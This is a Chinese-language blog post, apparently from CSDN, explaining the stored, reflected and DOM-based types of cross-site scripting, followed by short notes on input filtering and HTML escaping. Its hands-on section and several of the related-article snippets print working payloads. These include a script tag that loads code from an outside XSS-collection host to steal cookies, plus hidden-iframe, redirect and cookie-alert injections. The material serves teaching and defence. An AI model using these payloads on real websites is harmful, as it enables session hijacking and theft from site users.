XSS攻击和防御

最新推荐文章于 2023-07-02 11:41:48 发布
最新推荐文章于 2023-07-02 11:41:48 发布
阅读量341 收藏 1
点赞数
分类专栏: 网络安全 文章标签: XSS攻击防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43291459/article/details/102917387
版权
XSS攻击分类
  • 存储型XSS
    持久性:攻击者把攻击代码永久存储在目标服务器(多见于论坛,留言板等).危害性最大,影响面最广.
  • 反射型XSS
    非持久性:攻击脚本嵌入到某个URL链接,诱骗客户端点击而触发执行.
  • DOM型XSS
    通过前端脚本修改页面的DOM节点形成的XSS,不与服务器进行交互.
XSS攻击过程

存储型XSS攻击过程
在这里插入图片描述
反射型XSS攻击过程
在这里插入图片描述
DOM型XS攻击过程
在这里插入图片描述
三者区别:

存储区插入点
存储型服务器数据库HTML
反射型URLHTML
DOM型前端存储前端JavaScript
XSS攻击实战
  • 盗取Cookie:诱骗点击
    在这里插入图片描述
    注入代码:
<sCRiPt sRC=https://xss8.cc/tvW7>
</sCrIpT>

https://xss8.cc/tvW7核心代码:
在这里插入图片描述

  • Stored XSS:跨站到一个木马网站
    < Img>标签src属性
    < Script>标签src属性
    < Link>标签href属性
    Css中< Img>标签src
    Flash中< Img>标签
    1.用于测试是否存在跨站
<script>
alert("test")
</script>

2.弹出一个包含浏览器cookie信息的对话框

<script>
window.alert(document.cookie);
</script>

3.打开另一个网页窗口

<script>
window.open('http://www.target.com/index.asp','newwindow','width=200,height=200');
</script>

4.出现一个高0,宽0的网页框架

<iframe src=http://target.com/index.asp width=0 height=0>< iframe>

5.刷新到另一个页面

<meta http-equiv="refresh" content="1;URL=http://www.target.com/index.asp">

6.Scriptlet引入另一个界面

<object type="text/x-scriptlet" data="http://www.target.com/index.asp"></object>
XSS攻击防范

XSS有两大要素:

  • 攻击者提交恶意代码
    输入过滤:
    Str_replace()替换函数
    Preg_replace()执行正则表达式的搜索与替换
    Strtolow()转化为小写字符
    Trim()消除空格
    Stripslashes()消除反斜杠
    在这里插入图片描述
    在这里插入图片描述
    对HTML做充分转义
    htmlspecialchars():将"<“和”>"转换为HTML实体
    在这里插入图片描述
  • 浏览器执行恶意代码
Libra_Ng
关注
专栏目录
JSP Struts过滤xss攻击的解决办法
01-08
JSP Struts过滤xss攻击的解决办法 本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml <!-- 配置拦截器 --> <!-- 定义xss拦截器 -->
Web安全之XSS攻击防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
XSS攻击防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
XSS攻击及预防
weixin_48062613的博客
04-08 765
XSS 跨域脚本攻击,即在渲染DOM树的过程中发生了不在预期内执行的JS代码。访问劫持用户会话,插入恶意内容、重定向用户、使用恶意软件劫持用户浏览器、繁殖XSS蠕虫,甚至破坏网站、修改路由器配置信息等。 分类 持久性跨站:危害最大的一种,跨站代码存储在服务器(数据库)中 非持久性跨站:最常见的一种,网页中会存在嵌入好的恶意链接,用户点击后触发 DOM跨站:客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过
什么是XSS攻击?如何防范XSS攻击
_筱殇的博客
11-28 4万+
        XSS攻击又称CSS,全称Cross Site Script  (跨站脚本攻击),其原理是攻击者向有XSS漏洞的网站中输入恶意的 HTML 代码,当用户浏览该网站时,这段 HTML 代码会自动执行,从而达到攻击的目的。XSS 攻击类似于 SQL 注入攻击,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览...
8、XSS 攻击的防御pdf资料
最新发布
10-15
为了防御XSS攻击,开发者需要采取一系列措施,包括但不限于: - 对用户输入进行严格的过滤和转义,确保任何可能包含恶意脚本的数据在显示之前都被安全处理。 - 使用HTTP头部的Content-Security-Policy(CSP)来限制...
web安全之XSS攻击防御pdf
08-25
### Web安全之XSS攻击防御 #### 一、XSS基本原理 ##### 1.1 什么是XSS ...以上内容涵盖了XSS攻击的基本概念、分类、挖掘方法、利用方式以及防御策略等多个方面,对于深入理解和防御XSS攻击具有重要的指导意义。
.net core xss攻击防御的方法
10-18
.NET Core XSS攻击防御方法的知识点可以详细阐述如下: 首先,XSS攻击全称跨站脚本攻击,它是一种常见的网络安全漏洞。攻击者利用这一漏洞,在Web页面中植入恶意脚本代码,当其他用户浏览这些页面时,嵌入的恶意...
syn泛洪 过滤_SYN泛洪攻击死机原因和应对方法
weixin_42528534的博客
12-24 206
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"新BGP高防产品提供国内T级BGP带宽资源,可解决超大流量DDoS攻击,相比静态IDC高防,天然具有灾备能力,线路更稳定,访问速度更快,国内平均访问延时20ms...
XSS 的攻击和防御
dzqxwzoe的博客
01-14 245
Cross Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使其在用户的浏览器上运行。通过这些恶意的脚本,攻击者可获取用户的敏感信息如:Cookie、Session等。Cross Site Scripting 的英文首字母缩写应为 CSS,但是因为其和我们的样式语法 CSS(Cascading Style Sheets)一样,所以将 CSS 改成 XSS
Web安全——XSS攻击以及防御
mapbar_front的博客
06-13 1393
XSS(跨站脚本攻击) XSS——Cross site scripting 这是最常见的一种web安全问题。引起这种问题的原因是什么呢?主要是由于不合理的数据引起的。 &amp;amp;amp;lt;div&amp;amp;amp;gt; { content } &amp;amp;amp;lt;/div&amp;amp;amp;gt; 一般这样的页面结构,我们的页面解析出来的期望是这样的。 &amp;amp;amp;lt;div&amp;
信息安全工程实践笔记--Day1 信息收集&漏洞扫描
weixin_46447549的博客
11-22 2233
上课
网络安全之从原理看懂XSS
Galaxy_0的博客
01-18 1611
网络安全之从原理看懂XSS
XSS(跨站脚本攻击)详解
hello
07-02 4101
XSS简述-XSS类型-XSS常用标签
【封神台】cookie伪造目标权限
00勇士王子的博客
11-17 715
题目 解题过程 访问网站,是一个留言板 先用普通的xss测试一下 成功弹窗,说明地处存在xss漏洞 选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc) 原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo
XSS攻击常识及常见的XSS攻击脚本汇总
qw_xingzhe的专栏
06-16 7万+
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里中罗列...
xss绕过字符过滤_【渗透实例】记录一次XSS渗透过程
weixin_32493541的博客
01-04 923
0x01 找到存在XSS的位置没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。使用的XSS代码:<img src=1 onerror=alert(1)>0x02 构造XSS代码连接到XSS平台XSS平台给我们的XSS代码是这样的:</tExtArEa>'"><sCRiPt sRC=https...
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值